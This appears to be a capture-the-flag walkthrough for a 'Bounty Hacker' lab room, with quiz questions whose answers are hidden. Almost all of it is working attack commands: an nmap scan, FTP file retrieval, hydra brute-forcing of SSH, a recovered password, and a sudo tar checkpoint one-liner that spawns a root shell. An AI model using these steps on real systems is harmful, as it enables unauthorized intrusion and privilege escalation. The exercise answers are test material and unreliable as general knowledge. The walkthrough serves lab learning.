
Bounty Hacker
This guide contains the answer and steps necessary to get to them for the Bounty Hacker room.
Living up to the title.
Commands:
nmap -sV 10.10.216.171
ftp 10.10.216.171
get task.txt
cat task.txt
get locks.txt
cat locks.txt
hydra -l user -P locks.txt ssh://10.10.216.171:22 -t 4
hydra -l lin -P locks.txt ssh://10.10.216.171:22 -t 4
ssh lin@10.10.216.171
cat user.txt
susudo
RedDr4gonSynd1cat3
sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh tar: Removing leading `/' from member names
- Who wrote the task list?
Click for answer
- What service can you bruteforce with the text file found?
Click for answer
- What is the users password?
Click for answer
- user.txt
Click for answer
- root.txt
Click for answer